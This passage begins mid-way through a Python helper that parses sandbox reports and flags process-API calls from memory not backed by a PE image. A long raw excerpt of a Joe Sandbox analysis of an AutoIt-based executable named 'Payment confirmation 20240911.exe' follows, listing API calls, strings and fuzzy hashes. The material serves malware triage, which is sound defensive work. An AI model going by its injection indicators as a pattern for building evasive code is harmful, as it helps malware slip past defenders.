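def flag_unbacked_process_code(records):
    """(offset, touched APIs, fuzzy hash) for non-PE-backed functions using PROCESS_APIS."""
    return [(r.offset, sorted(r.api_names() & PROCESS_APIS), r.fuzzy_hash)
            for r in records if not r.backed_by_pe and r.api_names() & PROCESS_APIS]


# Two records copied from this report, argument lists trimmed (constructed input).
SAMPLE = """\
APIs
• CreateProcessW.KERNEL32(?,00000000), ref: 00261A5B
• ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00261B13
Memory Dump Source
• Source File: 00000000.00000002.350512103.0000000000260000.00000040.00001000.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
Similarity
• API ID: Process$CreateMemoryRead
• String ID:
• Instruction Fuzzy Hash: E6621D30A24258DBEB24CFA4C851BDEB372EF58300F1491A9D50DEB390E7769E91CB59
APIs
  • Part of subcall function 012E3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002), ref: 012E3FCD
• _free.LIBCMT ref: 01353C27
  • Part of subcall function 012EBDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 012EBF56
Strings
Memory Dump Source
• Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
Similarity
• API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• Instruction Fuzzy Hash: 6D91807191022AEFDF05EFA8CC94DFEB7B4BF18758F444469E816AB290EB349905CB50
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(dict(functions_per_region(recs)))
    for off, apis, fh in flag_unbacked_process_code(recs):
        print(f"unbacked code at {off} calls {', '.join(apis)} (fuzzy {fh[:16]}...)")
```

Run against the full text of a report, the region counter separates the AutoIt runtime at 0x12E0000 (hundreds of functions, PE-backed) from the handful of functions in the unbacked 0x260000 region, and the flag list points straight at the CreateProcessW/ReadProcessMemory pair; the Instruction Fuzzy Hash it returns is the value to pivot on across other reports.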
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ccde105ef3491ab5f9299e6cae6f7c14c82e55179c7478fbe7fee75e869b12b
                                          • Instruction ID: 9d842c4ecdc01694e7409092da7209e4e6b2c7fbce3988c225f0ed0986d6ce8f
                                          • Opcode Fuzzy Hash: 2ccde105ef3491ab5f9299e6cae6f7c14c82e55179c7478fbe7fee75e869b12b
                                          • Instruction Fuzzy Hash: C1F17C71A047069FCB14DF28C584B6ABBE5FFC8318F50892DE9999B291D730E945CF82
                                          APIs
                                          • SHGetMalloc.SHELL32(012E3C31), ref: 012E3A7D
                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 012E3AD2
                                          • SHGetDesktopFolder.SHELL32(?), ref: 012E3A8F
                                            • Part of subcall function 012E3B1E: _wcsncpy.LIBCMT ref: 012E3B32
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                          • String ID:
                                          • API String ID: 3981382179-0
                                          • Opcode ID: d3bd7da5c2c6a6647101c0dc78dd208409bc653fc3d23c76b36377bc3dc5b980
                                          • Instruction ID: ad074c80a866c1af5b2a23829e85fe9155eabec9cd6e073e3c32612a4d6bc849
                                          • Opcode Fuzzy Hash: d3bd7da5c2c6a6647101c0dc78dd208409bc653fc3d23c76b36377bc3dc5b980
                                          • Instruction Fuzzy Hash: 74218376B00114ABDB15DF99D888DEE77BDEF88701B404098F50AD7254EB309E45CBA0
                                          APIs
                                          • _memset.LIBCMT ref: 012E35BE
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 012E3667
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell__memset
                                          • String ID:
                                          • API String ID: 928536360-0
                                          • Opcode ID: ea63cc7cd9187c008de33a0311507e598f39524a3d8c61197f745e09ba2627d9
                                          • Instruction ID: 07fa527c288a2ad5fcca346797fb885c47eaee037ff2979e37d84d860c848d31
                                          • Opcode Fuzzy Hash: ea63cc7cd9187c008de33a0311507e598f39524a3d8c61197f745e09ba2627d9
                                          • Instruction Fuzzy Hash: 46318CB06143019FD732DF38D449697BBE8FB49309F40092EE69A83240E771A548CB56
                                          APIs
                                          • __FF_MSGBANNER.LIBCMT ref: 01304603
                                            • Part of subcall function 01308E52: __NMSG_WRITE.LIBCMT ref: 01308E79
                                            • Part of subcall function 01308E52: __NMSG_WRITE.LIBCMT ref: 01308E83
                                          • __NMSG_WRITE.LIBCMT ref: 0130460A
                                            • Part of subcall function 01308EB2: GetModuleFileNameW.KERNEL32(00000000,013A0312,00000104,?,00000001,01300127), ref: 01308F44
                                            • Part of subcall function 01308EB2: ___crtMessageBoxW.LIBCMT ref: 01308FF2
                                            • Part of subcall function 01301D65: ___crtCorExitProcess.LIBCMT ref: 01301D6B
                                            • Part of subcall function 01301D65: ExitProcess.KERNEL32 ref: 01301D74
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          • RtlAllocateHeap.NTDLL(00720000,00000000,00000001,?,?,?,?,01300127,?,012E125D,00000058,?,?), ref: 0130462F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                          • String ID:
                                          • API String ID: 1372826849-0
                                          • Opcode ID: 754d269c710d38e9263c58dcd0a8a75113320c45f9b74cd0c1c94c66a402b495
                                          • Instruction ID: bde9323f20b1d2dda7c43bb117a415bd42329da044db95f813442317990f1b48
                                          • Opcode Fuzzy Hash: 754d269c710d38e9263c58dcd0a8a75113320c45f9b74cd0c1c94c66a402b495
                                          • Instruction Fuzzy Hash: BB019231A0171AEAE6277B7CAC70A2B27CCAB8177DF010129E7059B1C4EBB099418665
                                          APIs
                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 0132CFE1
                                          • SetFileTime.KERNEL32(00000000,?,00000000,?,?,0132CC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0132CFF7
                                          • CloseHandle.KERNEL32(00000000), ref: 0132CFFE
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: CALL
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: EA06
                                          Strings
                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 013534AA
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                          APIs
                                          • _memmove.LIBCMT ref: 0130367B
                                          • __flush.LIBCMT ref: 0130369B
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          Similarity
                                          • API ID: __flush__getptd_noexit_memmove
                                          • String ID:
                                          APIs
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          • __getbuf.LIBCMT ref: 01309B8A
                                          • __lseeki64.LIBCMT ref: 01309BFA
                                          Similarity
                                          • API ID: __getbuf__getptd_noexit__lseeki64
                                          • String ID:
                                          APIs
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          APIs
                                          • IsThemeActive.UXTHEME ref: 012E36E6
                                            • Part of subcall function 01302025: __lock.LIBCMT ref: 0130202B
                                            • Part of subcall function 012E32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 012E32F6
                                            • Part of subcall function 012E32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 012E330B
                                            • Part of subcall function 012E374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 012E376D
                                            • Part of subcall function 012E374E: IsDebuggerPresent.KERNEL32(?,?), ref: 012E377F
                                            • Part of subcall function 012E374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Payment confirmation 20240911.exe,00000104,?,013A1120,C:\Users\user\Desktop\Payment confirmation 20240911.exe,013A1124,?,?), ref: 012E37EE
                                            • Part of subcall function 012E374E: SetCurrentDirectoryW.KERNEL32(?), ref: 012E3860
                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?), ref: 012E3726
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                          • String ID:
                                          APIs
                                          • ___lock_fhandle.LIBCMT ref: 0130F7D9
                                          • __close_nolock.LIBCMT ref: 0130F7F2
                                            • Part of subcall function 0130886A: __getptd_noexit.LIBCMT ref: 0130886A
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          Similarity
                                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                          • String ID:
                                          APIs
                                            • Part of subcall function 013045EC: __FF_MSGBANNER.LIBCMT ref: 01304603
                                            • Part of subcall function 013045EC: __NMSG_WRITE.LIBCMT ref: 0130460A
                                            • Part of subcall function 013045EC: RtlAllocateHeap.NTDLL(00720000,00000000,00000001,?,?,?,?,01300127,?,012E125D,00000058,?,?), ref: 0130462F
                                          • std::exception::exception.LIBCMT ref: 0130013E
                                          • __CxxThrowException@8.LIBCMT ref: 01300153
                                            • Part of subcall function 01307495: RaiseException.KERNEL32(?,?,012E125D,01396598,?,?,?,01300158,012E125D,01396598,?,00000001), ref: 013074E6
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                          • String ID:
                                          APIs
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          • __lock_file.LIBCMT ref: 013042B9
                                            • Part of subcall function 01305A9F: __lock.LIBCMT ref: 01305AC2
                                          • __fclose_nolock.LIBCMT ref: 013042C4
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          APIs
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          APIs
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          APIs
                                            • Part of subcall function 012E3F5D: FreeLibrary.KERNEL32(00000000,?), ref: 012E3F90
                                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,012E34E2,?,00000001), ref: 012E3FCD
                                            • Part of subcall function 012E3E78: FreeLibrary.KERNEL32(00000000), ref: 012E3EAB
                                            • Part of subcall function 012E4010: _memmove.LIBCMT ref: 012E405A
                                          Similarity
                                          • API ID: Library$Free$Load_memmove
                                          • String ID:
                                          APIs
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: ee0b85fa75516ad0bcd8488b4d1d9ed4c393448d29b20c4699cfa57713fb20c9
                                          • Instruction ID: 7148c254c338b6a44e620c3a35917b109b02e4927df42758ccb41e83df7006ba
                                          • Opcode Fuzzy Hash: ee0b85fa75516ad0bcd8488b4d1d9ed4c393448d29b20c4699cfa57713fb20c9
                                          • Instruction Fuzzy Hash: 26214674118202CFEB29DF68C444B2BBBE2BF88348F04496CFA9657262D331E845CF52
                                          APIs
                                          • ___lock_fhandle.LIBCMT ref: 0130BD73
                                            • Part of subcall function 0130886A: __getptd_noexit.LIBCMT ref: 0130886A
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          Similarity
                                          • API ID: __getptd_noexit$___lock_fhandle
                                          • String ID:
                                          • API String ID: 1144279405-0
                                          • Opcode ID: e68b7f319db32ea33b45ec5d4e1bb26481119bb93a12d47bf4132480a4ef4472
                                          • Instruction ID: 1ebe0802985ffef6f904606a616eab1793600f0994fa2ce87e84bb741fc05302
                                          • Opcode Fuzzy Hash: e68b7f319db32ea33b45ec5d4e1bb26481119bb93a12d47bf4132480a4ef4472
                                          • Instruction Fuzzy Hash: DB11C176C0161A9FD713AF6CE860358FBE16F6133DF090280D5B41F2E9CBB48A008B62
                                          APIs
                                          • __lock_file.LIBCMT ref: 0130377D
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          Similarity
                                          • API ID: __getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2597487223-0
                                          • Opcode ID: cce5b12941e49f149918b32f9a2257d05178f1bcb39a43381e9d08ba7256bb73
                                          • Instruction ID: bc5d6ca026eaf79b54f3e3634f27e67787c3afdb8357a69cc2c93076ae559ae6
                                          • Opcode Fuzzy Hash: cce5b12941e49f149918b32f9a2257d05178f1bcb39a43381e9d08ba7256bb73
                                          • Instruction Fuzzy Hash: B7F06D71901206AEEF23AF7D8C1579F7AE0BF10A68F048514E8149A2D0D7B98A50DB91
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,?,?,?,012E34E2,?,00000001), ref: 012E3E6D
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: b05acda105e302d2c94f8e9145575ba206ad4b2ba033e849107ce77cc33dbee9
                                          • Instruction ID: b44593c67169e9cfee90c1a7f55a04ec41e77318e3112ac8eff5ed1dfa1333e6
                                          • Opcode Fuzzy Hash: b05acda105e302d2c94f8e9145575ba206ad4b2ba033e849107ce77cc33dbee9
                                          • Instruction Fuzzy Hash: 25F03972121742DFCB35DF68D498813BBF4BF0462A3588A3EE2D683621C7719844CF00
                                          APIs
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: 7f38f8afb5791b6db70afd3c6b14bc81a16c30f28029a7eecbf1f8901465bef4
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: 13310872A10106ABD708DF5CC681A69FBA1FF49300F2486A9E64ADB255D730EDC1CBD0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350512103.0000000000260000.00000040.00001000.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_260000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction ID: d5adc70b3c7f7e36dee1bcb08f6ab4e22e94b412ebbc702e7085227c85ce064f
                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction Fuzzy Hash: 56E0E67494010EDFDB00EFB4D94969E7FB4EF04701F100161FD01D2280D6309D608A72
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0134F64E
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0134F6AD
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0134F6EA
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0134F711
                                          • SendMessageW.USER32 ref: 0134F737
                                          • _wcsncpy.LIBCMT ref: 0134F7A3
                                          • GetKeyState.USER32(00000011), ref: 0134F7C4
                                          • GetKeyState.USER32(00000009), ref: 0134F7D1
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0134F7E7
                                          • GetKeyState.USER32(00000010), ref: 0134F7F1
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0134F820
                                          • SendMessageW.USER32 ref: 0134F843
                                          • SendMessageW.USER32(?,00001030,?,0134DE69), ref: 0134F940
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0134F956
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0134F967
                                          • SetCapture.USER32(?), ref: 0134F970
                                          • ClientToScreen.USER32(?,?), ref: 0134F9D4
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0134F9E0
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0134F9FA
                                          • ReleaseCapture.USER32(?,?,?,?), ref: 0134FA05
                                          • GetCursorPos.USER32(?), ref: 0134FA3A
                                          • ScreenToClient.USER32(?,?), ref: 0134FA47
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0134FAA9
                                          • SendMessageW.USER32 ref: 0134FAD3
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0134FB12
                                          • SendMessageW.USER32 ref: 0134FB3D
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0134FB55
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0134FB60
                                          • GetCursorPos.USER32(?), ref: 0134FB81
                                          • ScreenToClient.USER32(?,?), ref: 0134FB8E
                                          • GetParent.USER32(?), ref: 0134FBAA
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0134FC10
                                          • SendMessageW.USER32 ref: 0134FC40
                                          • ClientToScreen.USER32(?,?), ref: 0134FC96
                                          • TrackPopupMenuEx.USER32 ref: 0134FCC2
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0134FCEA
                                          • SendMessageW.USER32 ref: 0134FD0D
                                          • ClientToScreen.USER32(?,?), ref: 0134FD57
                                          • TrackPopupMenuEx.USER32 ref: 0134FD87
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0134FE1C
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F$`"u
                                          • API String ID: 2516578528-3462107663
                                          • Opcode ID: d998c86027b7360fa3d3e3806f03a9a25d4d1f279a8d87b175bf4be86d83bdbe
                                          • Instruction ID: c816c2a67d70362a15586e83d835b3dba1d40ae87aa6867aa5b29aef27258c17
                                          • Opcode Fuzzy Hash: d998c86027b7360fa3d3e3806f03a9a25d4d1f279a8d87b175bf4be86d83bdbe
                                          • Instruction Fuzzy Hash: E132BE74204646AFEB20DF6CC884AAABFEDFF48368F084519F695872A1D734EC54CB51
                                          APIs
                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0134AFDB
                                          Strings
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: %d/%02d/%02d$`"u
                                          • API String ID: 3850602802-1106926150
                                          • Opcode ID: 47824e55a2a97d735797d331c99fa49a26812149a778caf188cbd8a06822b6fb
                                          • Instruction ID: 2a39e3f4019341897125a6bdf3e8b6ffa22b83cd540d68635ddfc89e194f5905
                                          • Opcode Fuzzy Hash: 47824e55a2a97d735797d331c99fa49a26812149a778caf188cbd8a06822b6fb
                                          • Instruction Fuzzy Hash: 4212B1B1640249ABEB258F69CC48FAE7FF8EF45318F008119F65ADB2D0DB70A945CB51
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 012FF796
                                          • FindWindowW.USER32 ref: 01354388
                                          • IsIconic.USER32(000000FF), ref: 01354391
                                          • ShowWindow.USER32(000000FF,00000009), ref: 0135439E
                                          • SetForegroundWindow.USER32(000000FF), ref: 013543A8
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 013543BE
                                          • GetCurrentThreadId.KERNEL32 ref: 013543C5
                                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 013543D1
                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 013543E2
                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 013543EA
                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 013543F2
                                          • SetForegroundWindow.USER32(000000FF), ref: 013543F5
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0135440A
                                          • keybd_event.USER32 ref: 01354415
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0135441F
                                          • keybd_event.USER32 ref: 01354424
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0135442D
                                          • keybd_event.USER32 ref: 01354432
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0135443C
                                          • keybd_event.USER32 ref: 01354441
                                          • SetForegroundWindow.USER32(000000FF), ref: 01354444
                                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0135446B
                                          Strings
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: 50007e889fba81e836864b070a9020f6a72231dfb69f858054811649f4f2310b
                                          • Instruction ID: 2126a8cee9130bd886016021d6b1649d4bd1bc87e28e0ef02ea36e276266ebf2
                                          • Opcode Fuzzy Hash: 50007e889fba81e836864b070a9020f6a72231dfb69f858054811649f4f2310b
                                          • Instruction Fuzzy Hash: 973183B1B80218BBEB315BB59C49F7F7E6CEB44B54F108015FB05EA1D1D6B05941ABA0
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,013A22E8,?,00000000,?,012E3E2E,?,00000000,?,0137DBF0,00000000,?), ref: 012EBE8B
                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,012E3E2E,?,00000000,?,0137DBF0,00000000,?,00000002), ref: 012EBEA7
                                          • __wsplitpath.LIBCMT ref: 012EBF19
                                            • Part of subcall function 0130297D: __wsplitpath_helper.LIBCMT ref: 013029BD
                                          • _wcscpy.LIBCMT ref: 012EBF31
                                          • _wcscat.LIBCMT ref: 012EBF46
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 012EBF56
                                          • _wcscpy.LIBCMT ref: 012EC03E
                                          • _wcscpy.LIBCMT ref: 012EC1ED
                                          • SetCurrentDirectoryW.KERNEL32 ref: 012EC250
                                            • Part of subcall function 0130010A: std::exception::exception.LIBCMT ref: 0130013E
                                            • Part of subcall function 0130010A: __CxxThrowException@8.LIBCMT ref: 01300153
                                            • Part of subcall function 012EC320: _memmove.LIBCMT ref: 012EC419
                                          Strings
                                          Similarity
                                          • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                                          • API String ID: 2542276039-689609797
                                          • Opcode ID: eb0f4f95fec1932243d3afb29ee9cdaf65fe78ff62850b5f149296852480e7be
                                          • Instruction ID: 9aa479a95a4b3045142a482622b4f8cb06cebeef433c4ed174b4fea9e658c85b
                                          • Opcode Fuzzy Hash: eb0f4f95fec1932243d3afb29ee9cdaf65fe78ff62850b5f149296852480e7be
                                          • Instruction Fuzzy Hash: F842E0715183469FD711EFA4C844BAFBBE8BF95348F40482DE98987291EB30E518CB93
                                          APIs
                                            • Part of subcall function 0131BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0131BF0F
                                            • Part of subcall function 0131BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0131BF3C
                                            • Part of subcall function 0131BEC3: GetLastError.KERNEL32 ref: 0131BF49
                                          • _memset.LIBCMT ref: 0131BA34
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0131BA86
                                          • CloseHandle.KERNEL32(?), ref: 0131BA97
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0131BAAE
                                          • GetProcessWindowStation.USER32 ref: 0131BAC7
                                          • SetProcessWindowStation.USER32 ref: 0131BAD1
                                          • OpenDesktopW.USER32 ref: 0131BAEB
                                            • Part of subcall function 0131B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0131B9EC), ref: 0131B8C5
                                            • Part of subcall function 0131B8B0: CloseHandle.KERNEL32(?), ref: 0131B8D7
                                          Strings
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                          • String ID: $default$winsta0
                                          • API String ID: 2063423040-1027155976
                                          • Opcode ID: 5267208ad66c9f6293f4bdfa8c30d50d6c5501f7da7eecb66276d4d1e055a813
                                          • Instruction ID: cff3c1acf72afb8f404b9f5af47ed26d9fae22072aac278bc7d9955af27563e8
                                          • Opcode Fuzzy Hash: 5267208ad66c9f6293f4bdfa8c30d50d6c5501f7da7eecb66276d4d1e055a813
                                          • Instruction Fuzzy Hash: DC816C71900249EFEF159FE9CD44AEEBBBDFF08308F048559FA55A6168DB318A14DB20
                                          APIs
                                            • Part of subcall function 012E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 012E31DA
                                            • Part of subcall function 01327B9F: __wsplitpath.LIBCMT ref: 01327BBC
                                            • Part of subcall function 01327B9F: __wsplitpath.LIBCMT ref: 01327BCF
                                            • Part of subcall function 01327C0C: GetFileAttributesW.KERNEL32(?,01326A7B), ref: 01327C0D
                                          • _wcscat.LIBCMT ref: 01326B9D
                                          • _wcscat.LIBCMT ref: 01326BBB
                                          • __wsplitpath.LIBCMT ref: 01326BE2
                                          • FindFirstFileW.KERNEL32(?,?), ref: 01326BF8
                                          • _wcscpy.LIBCMT ref: 01326C57
                                          • _wcscat.LIBCMT ref: 01326C6A
                                          • _wcscat.LIBCMT ref: 01326C7D
                                          • lstrcmpiW.KERNEL32(?,?), ref: 01326CAB
                                          • DeleteFileW.KERNEL32(?), ref: 01326CBC
                                          • MoveFileW.KERNEL32 ref: 01326CDB
                                          • MoveFileW.KERNEL32 ref: 01326CEA
                                          • CopyFileW.KERNEL32 ref: 01326CFF
                                          • DeleteFileW.KERNEL32(?), ref: 01326D10
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 01326D37
                                          • FindClose.KERNEL32(00000000), ref: 01326D53
                                          • FindClose.KERNEL32(00000000), ref: 01326D61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
